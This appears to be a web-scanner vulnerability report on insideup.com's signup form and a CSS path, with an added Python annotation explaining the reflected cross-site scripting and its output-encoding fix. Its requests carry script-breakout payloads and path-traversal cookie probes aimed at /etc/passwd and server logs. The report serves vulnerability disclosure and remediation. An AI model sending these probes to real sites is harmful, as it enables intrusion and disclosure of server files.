src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x001375)</script>
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 308
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001375)%3c%2fscript%3e&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:22 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=E20EF2B25C68D5A7558B71CFDF3D25DA; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
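The response the report captures for this finding is cut off before the signup form re-fills the firstName field, so the reflection itself is not visible above. The following Python is an added example, not part of the Netsparker report and not InsideUp's own code: it rebuilds the report's POST body with the same probe, then shows the kind of check a tester would run on the response to separate a verbatim reflection (exploitable) from an entity-encoded one (safe), next to the attribute-context encoding that fixes it. The `render_vulnerable` and `render_fixed` functions are constructed stand-ins for the server-side template, which is an assumption about how the page re-populates the field.

```python
import html
import re
from urllib.parse import urlencode

# The probe sent in firstName (the Parameters table shows the alert() form; the
# raw request sends netsparker() instead). It is built to close an attribute
# value, a <style> block and a <script> block before starting its own script.
CANARY = "'\"--></style></script><script>alert(0x001375)</script>"


def build_signup_body(first_name: str) -> str:
    """Rebuild the report's POST body with a chosen firstName; other fields as sent."""
    fields = {
        "refererUrl": "http://www.insideup.com/index.html",
        "pseudonym": "3",
        "emailAddress": "netsparker@example.com",
        "firstName": first_name,
        "lastName": "Smith",
        "companyName": "Smith",
        "password1": "3",
        "password2": "3",
        "termsOfService": "1",
        "receiveSpecialOfferEmail": "1",
        "x": "0",
        "y": "0",
    }
    return urlencode(fields)


def render_vulnerable(first_name: str) -> str:
    """Constructed stand-in for the signup page re-filling the field with raw input
    (assumption: the report's response is truncated before this field)."""
    return f'<input type="text" name="firstName" value="{first_name}" id="firstName" />'


def render_fixed(first_name: str) -> str:
    """Same markup with HTML attribute encoding applied at output time:
    & < > " ' become entities, so the value cannot close the value="..." attribute."""
    safe = html.escape(first_name, quote=True)
    return f'<input type="text" name="firstName" value="{safe}" id="firstName" />'


def reflected_attribute_value(body: str, name: str):
    """Return what a browser will take as the value of the named input, or None."""
    m = re.search(rf'name="{re.escape(name)}"[^>]*?value="([^"]*)"', body)
    return m.group(1) if m else None


def classify(body: str, canary: str) -> str:
    """How the probe came back: verbatim (exploitable), entity-encoded (safe), or
    absent. Checking for the encoded form avoids flagging a page that only
    displays the text as data."""
    if canary in body:
        return "reflected-unencoded"
    if html.escape(canary, quote=True) in body:
        return "reflected-encoded"
    return "not-reflected"


if __name__ == "__main__":
    print(build_signup_body(CANARY))
    for label, page in (("vulnerable", render_vulnerable(CANARY)),
                        ("fixed", render_fixed(CANARY))):
        print(label, classify(page, CANARY),
              repr(reflected_attribute_value(page, "firstName")))
```

On the vulnerable rendering the attribute value the browser actually sees is just `'`, because the probe's `"` terminates the attribute and everything after it is parsed as markup, which is why the scanner marks the parameter Confirmed. The same output encoding has to be applied to every field the summary lists as Confirmed on this form (companyName, emailAddress, lastName, pseudonym, refererUrl and the rest); `html.escape` covers HTML text and attribute context only, and a value placed inside an existing script or style block needs that context's own encoding.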
- /ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B5)%3C/script%3E

/ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B5)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013B5)</script>

Request

GET /ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013B5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 